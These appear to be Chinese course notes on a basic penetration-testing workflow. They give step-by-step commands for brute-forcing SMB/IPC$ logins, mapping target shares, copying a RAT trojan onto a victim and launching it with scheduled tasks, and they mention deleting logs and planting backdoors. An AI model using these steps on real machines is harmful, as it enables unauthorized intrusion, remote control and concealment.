admin管理员组文章数量:1647960
一、hacker的攻击基本流程(渗透测试流程)
-
和甲方签合同被授权(不授权就是非法)
-
信息收集:要攻击的对象都有哪些人,什么系统,有多少台是服务器,这些服务器都是什么服务器(即服务器上开了什么端口号)
常用的一些命令:nslookup(收集域名的IP地址),whois(查询域名的IP以及所有者等信息,linux命令)
-
扫描漏洞:扫描----软件的,代码的,网站本身的,网络设备的漏洞,确定漏洞范围,哪些可以攻击
- 网站漏洞:
- 使用软件扫描IP范围,关心的端口,如果扫出来有开放80端口的就是网站服务器,可以再用渗透工具和命令获取这个网站服务器的网站是由什么软件发布的(IIS,apache),这些软件都是有漏洞的
- 高级扫描:再查看IIS是什么版本,不同版本有不同的漏洞(如win2003使用的IIS6.0版本;win2008使用的IIS7.0),此时就不是对网站本身的攻击,而是发布网站的软件进行攻击。如果请维护人员将漏洞补上了,再去扫描网站漏洞
- 扫描网站本身漏洞:网站十大漏洞(SQL注入,xss,文件上传等),利用一些工具按照我们学过的知识对网站进行破解和攻击
- 攻击网站是为了拿到发布此网站的服务器的最高权限—服务器管理员账号和密码,对网站本身并不关心。知道IP和账号密码就可以使用telnet远程控制此服务器了。那么服务器上的数据都可以挡下来,比如数据库中的信息
- 网站漏洞:
-
漏洞利用 :从最简单的漏洞入手,一个一个试
- 有很多这里举一个例子:比如有些win7系统的3389端口(远程桌面)有漏洞,可以利用漏洞进行溢出攻击:把对方电脑上的3389那个软件的内存占满溢出,那么他的电脑就属于失控状态,此时立马可以拿到对方电脑的system权限,黑客电脑上就弹出来对方的cmd窗口,可以通过命令对对方的电脑操作。(根本不需要知道账号密码)
-
提权:拿到对方的shell窗口(命令行窗口)、拿到对方的最高权限、或者拿到对方的桌面环境
-
毁尸灭迹:操作会在日志中记录,要删除日志中的记录
-
留后门:下次再攻击就不需要这么多步骤了,直接攻击、控制即可(一般就是植入木马等)
-
做渗透测试报告
-
如果再给钱,就可以针对漏洞做安全加固
以上是简单的渗透测试步骤,不一定全面也不一定每个步骤都有,这里简单知道一下,后面会全面讲解
二、渗透工具
1.扫描工具
- Nmap:linux操作系统下非常好用的网络扫描和嗅探软件;可以扫描公司中哪些IP在线、哪些电脑开着什么端口以及每个电脑使用什么操作系统,电脑的补丁达到的版本等
- scanport:可以设置扫描IP的范围以及指定端口的小巧工具(windows使用)
2.暴力破解工具
- hydra:是世界顶级密码暴力密码破解工具,支持几乎所有协议的在线密码破解(只要是要弹框让用户输入账号密码的都可以暴力破解,比如445文件共享,3389远程桌面,20/21FTP等)
- NTscan:只能针对139(网络共享的端口)/445端口弹框进行暴力破解(windows使用)
3.密码字典生成工具
- 一般与暴力破解工具一起使用
- 在百度上查找即可,每一款软件都有自己的特色。
4.木马制作软件
- 灰鸽子,冰河,大鲨鱼等
三、渗透工具渗透原理
1.扫描端口号的原理
-
telnet命令:
telnet 目标IP 测试端口号
(手工测试端口号开放)这条命令会向目标IP的端口号发一个探测包,如果对方回应了则表示开启;如果没有回应则未开启
-
注意:由于扫描和暴力破解工具的原理是用命令发送探测包和尝试连接共享,所以一定要在同一个局域网内,才能实现渗透
2.暴力破解的原理
这里专门讲解针对445端口暴力破解的原理,其他端口的爆破也有其他的原理
-
选定扫描的IP范围,即可以对多台电脑进行暴力破解,但是一般此时都会确定下来要暴力破解指定的服务器或PC,所以起始IP和结束IP填一样的即可
-
选择尝试连接的共享:可以选
C$
,admin$
,IPC$
等默认共享,因为一般人只要打开445端口,这几个是电脑默认的共享 -
点击开始:通过不断的使用命令
net use f: \\目标IP\选择连接的共享 密码字典中的密码 /user:用户名字典中的用户名
,没有反应就一直发送连接命令,把密码字典和用户名字典中的用户名组合全部尝试一遍,如果账号密码正确,则会有回应,说明暴力破解成功!一般都是破解管理员用户,拿到最高权限一般服务器的用户名为administrator,只用尝试密码即可;PC的用户名采用社会工程学去得到用户名
3.密码生成器使用
-
运用社会工程学,得到相关信息,生成密码字典(.txt文件),然后将文件内容复制到暴力破解软件中的DIC文件中,最后暴力破解软件会一直尝试密码字典中的字典
4.木马原理
-
如果以后学了kali,可以通过命令为木马设置各种各样的功能和选项,现在只能通过软件的图形化界面设置即可
自动上线设置,安装选项,启动项设置,代理服务等都可以通过命令来完成设置
四、渗透攻击举例–IPC$
1.文件共享445端口漏洞
- 文件共享服务端口445有漏洞,所有的磁盘和IPC$都是默认共享的,如果能得到对方的管理员的账号和密码,就可以通过命令查看和修改对方电脑上的任意文件
2.操作共享文件的命令(net use)
-
将对方共享文件映射到自己的某个盘符下
net use 盘符: \\目标IP\共享文件名 密码 /user:用户名 #比如 net use f: \\10.1.1.2\c$ 123 /user:administrator
但此命令有个缺陷,如果关机或者注销后,这个映射就不可用了。但有个方法可以开机自动建立连接
-
开机自动建立连接
右键我的电脑–映射网络驱动器–设置映射到本地的盘符和需要映射的共享文件夹–勾选登录时重新连接即可
-
删除共享映射
net use f: /del #删除指定盘符的映射 net use * /del #删除映射到本地的所有映射
3.IPC$渗透具体流程
-
将自己的电脑和要攻击对象处于同一网段(通过上述渗透原理可知)
-
使用扫描工具比如scanport设置扫描IP范围以及端口号445,确定下来哪些服务器或PC开启445端口,只要扫描到开启的就可以考虑进行445攻击了
-
通过社会工程学获取相关信息,利用密码字典生成器,生成密码字典(服务器的用户名一般都为adminsitrator);将字典txt文件中的密码复制到NT_pass.dic文件中,方便NTscan10爆破工具使用
-
再使用专门针对445端口暴力破解软件比如NTscan10,针对指定IP的主机及指定端口445/139,利用生成的密码字典进行暴力破解,得到对方的账号密码
-
再通过命令
net use \\10.1.1.2\ipc$ 123 /user:administrator
(破解到的目标IP为10.1.1.2,用户名为administrator,密码为123)与对方的空连接ipc$建立连接IPC$
:为默认开启的共享,由于没有关联任何路径(不像C$
,D:
这些),所以称为空连接,但只要连接到对方的IPC$
,就连接了对方的整个电脑,可以通过命令对对方电脑做任何操作 -
通过命令操作对方电脑(注意要使用网络路径
\\
和共享文件或者磁盘的共享名)以前dos命令涉及到路径的地方都改为网络路径即可(\\10.1.1.2\d$表示对方电脑下的d盘),不要出现
d:
(写共享名)
4.植入木马操作
-
制作木马的软件:灰鸽子,大鲨鱼,冰河等
-
木马特点:木马对目标系统没有任何伤害,且无征兆。木马有没有威胁取决于控制木马的人。
-
使用灰鸽子软件制作简单的木马留后门:
-
打开灰鸽子软件界面(挂马、加壳操作后面学习,现在只要会简单用软件即可)
-
点击配置服务器程序
一般来说,我们将木马植入对方,对方和木马为我提供服务器,可以理解为我是客户端,对方是服务端,所以制作木马又可以叫制作服务程序
-
服务器配置
-
安装选项:即木马在对方电脑上存放的位置;图标可以通过ICO生成一个好看的图标
-
启动项设置:可以将木马写入到注册表启动项(不容易清除干净);优先安装成服务器启动(将木马当成一种服务,开机木马和其他服务一同启动)
-
自动上线设置:其他的功能可以先不设置,这个最重要。告诉木马主人是谁(木马主动联系的IP),设置保存路径(制作好的木马起名和保存在本地的路径)—点击生成服务器
-
-
植入木马
-
通过命令将本地的创建好的木马程序复制到对方电脑上一个不起眼的位置
copy d:\muma.exe \\10.1.1.2\c$\system #将本地d盘下的muma程序拷贝到对方电脑的C盘system文件夹下
-
-
启动木马
-
方式一:通过打开对方的telnet端口23,通过telnet命令连接对方电脑的cmd窗口,再直接输入的
路径\木马程序名.exe
启动木马 -
方式二:通过at命令做一个计划任务
net time \\10.1.1.2 #查看对方电脑上的当前时间
at \\10.1.1.2 时间 "c:\system\muma.exe" #定时执行作业 #时间格式:11:29
at \\10.1.1.2 #显示指定电脑上的计划任务列表
-
切忌:一定不要在自己的电脑cmd窗口上直接输入
网络路径\木马程序名.exe
,因为这是在你自己的电脑上运行对方电脑上的木马程序!!!
-
-
对对方电脑做查看或修改
-
通过在灰鸽子软件上(对自动上线的主机)进行相关操作
-
下载上传文件、注册表编辑,远程控制、telnet、捕获屏幕、接管鼠标键盘、摄像头监控等
-
-
五、相关命令总结
1.telnet
telent 目标IP 端口号 #手工测试端口号开放
2 use
net use \\目标主机IP\ipc$ 密码 /user:用户名 #建立空连接
net use f: \\10.1.1.1\c$ 密码 /user:用户名 #建立连接映射到本地磁盘
以下为建立空连接后,才能执行的相关操作
2.copy
copy 本地路径\文件名.后缀名 \\目标IP\盘符$\路径 #将本地文件拷入到对方电脑的路径下
#举例:
copy d:\muma.exe \\10.1.1.2\c$\system
3 time
net time #查看本地时间
net time \\10.1.1.1 #查看指定主机的电脑时间(前提是要先与对方主机建立空连接)
4.at
at #显示本地计划任务列表
at \\10.1.1.1 #显示指定主机的计划任务列表(前提是与对方主机建立空连接)
at \\10.1.1.1 19:30 "c:\system\muma.exe" #在指定时间执行相关对方主机上的某程序(前提是建立空连接)
win10系统已经用该命令:替换为
schtasks
版权声明:本文标题:day09、1 - 简单渗透测试流程 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/xitong/1729490854a1202507.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论